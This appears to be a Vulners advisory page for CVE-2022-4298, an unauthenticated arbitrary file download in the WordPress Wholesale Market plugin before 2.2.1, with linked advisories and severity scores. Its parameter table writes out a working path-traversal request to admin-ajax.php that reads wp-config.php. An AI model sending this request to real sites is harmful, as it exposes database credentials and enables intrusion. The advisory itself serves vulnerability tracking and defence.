Vulners
Lucene search
CVE-2022-4298
ποΈΒ 02 Jan 2023Β 21:49:31Reported byΒ WPScanTypeΒ 
Β cveπΒ web.nvd.nist.govπΒ 54Β Viewsπ WEB
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2022-4298 | 4 Jan 202311:55 | β | circl |
 | WordPress plugin Wholesale Market θ·―εΎιεζΌζ΄ | 2 Jan 202300:00 | β | cnnvd |
 | CVE-2022-4298 Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download | 2 Jan 202321:49 | β | cvelist |
 | CVE-2022-4298 | 2 Jan 202322:15 | β | nvd |
 | CVE-2022-4298 | 2 Jan 202322:15 | β | osv |
 | Design/Logic Flaw | 2 Jan 202322:15 | β | prion |
 | PT-2023-14167 Β· WordPress Β· Wholesale Market | 2 Jan 202300:00 | β | ptsecurity |
 | CVE-2022-4298 | 23 May 202500:35 | β | redhatcve |
 | CVE-2022-4298 Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download | 2 Jan 202321:49 | β | vulnrichment |
 | Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download | 12 Dec 202200:00 | β | wpexploit |
10
Node
[
{
"vendor": "Unknown",
"product": "Wholesale Market",
"versions": [
{
"status": "affected",
"versionType": "custom",
"version": "0",
"lessThan": "2.2.1"
}
],
"defaultStatus": "unaffected",
"collectionURL": "https://wordpress.org/plugins"
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| action | query param | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv | Unauthenticated access via admin-ajax action to read_csv endpoint enabling file operations | |
| action | query param | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php | Path traversal via admin-ajax log download parameter exposing wp-config.php contents | |
| ced_cwsm_log_download | query param | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php | Path traversal via admin-ajax log download parameter exposing wp-config.php contents | |
| tab | query param | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php | Path traversal via admin-ajax log download parameter exposing wp-config.php contents | |
| section | query param | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php | Path traversal via admin-ajax log download parameter exposing wp-config.php contents |
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Apr 2025 19:15Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.55741
SSVC